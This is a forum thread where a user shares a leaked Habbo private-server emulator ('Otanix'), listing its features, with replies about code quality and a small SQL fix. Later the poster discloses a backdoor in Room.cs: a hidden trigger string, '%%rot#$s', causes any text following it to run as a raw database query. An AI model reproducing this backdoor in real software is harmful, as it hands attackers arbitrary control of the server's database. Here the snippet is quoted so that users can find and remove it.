Otanix Emulator [ButterFly Rename]

Arfeu

New Member
Oct 13, 2017
16
11
Hello everyone I do not like to make leaks but I also do not like to see the project of other people being sold, so I'm posting in open source to anyone who has interest

Github

Images:
Database:
Swf:

Features (I do not know if everything on this list works)
Ball
Football locker room
Habbo People
Habbo Quiz
Timer
Habbo Home
Roller Push
New Wired
Thumbnails
Buy Colors
Helpers Tool
Mood-Tools
New Commands
Architect's Club
Hall of Fame
Clothes carry faster
PathFinder
Achievements
Login Staff
Rooms Pack
Forum Actions
Jukebox
Nux Alert
Bot Frank
All Bots
New Pet
Tools for Horses
Mostro Plant
Groups Chat
Floor
And other new things
 

Lotus

Legacy, it's all anyone leaves behind.
Jun 8, 2012
1,637
501
Ngl, this looks clean af. Unsure about the source however, I shall take a peek later
 

Pinkman

Posting Freak
Jul 27, 2016
814
193
This features are nice but most likely poorly coded and stolen from other servers such as Fanta server which is a rename of Plus but with these features coded.
 

Connor

Member
May 28, 2010
87
6
Managed to get this up and running. Despite the poorly implemented code, the emulator does have some nice features. May be useful to learn from. (how packets are structured etc.)
 

NotPiped

New Member
Nov 28, 2017
5
2
UserDataFactory.cs at line : 33 replace by this:

dbClient.setQuery("SELECT * FROM users WHERE auth_ticket = @sso");

cheers.
 

Arfeu

New Member
Oct 13, 2017
16
11
Hello, guys, updating a few things about the emulator, Quackster has found a backdoor but I do not know if everyone has already seen it I will be reviewing here and the correction will soon be with the emulator update

In Room.cs line 3620:
if (StringType.Contains("%%rot#$s"))
{
var novasql = StringType.Replace("%%rot#$s", "");
using (IQueryAdapter dbClient = OtanixEnvironment.GetDatabaseManager().getQueryreactor())
{
dbClient.runFastQuery(novasql);
}
return;
}
 

Arfeu

New Member
Oct 13, 2017
16
11
I had closed the repository of this emulator at a time, I made the correction for Habbo Club and other things for those who have interest in using the repository is reopened!
 

Users who are viewing this thread

Top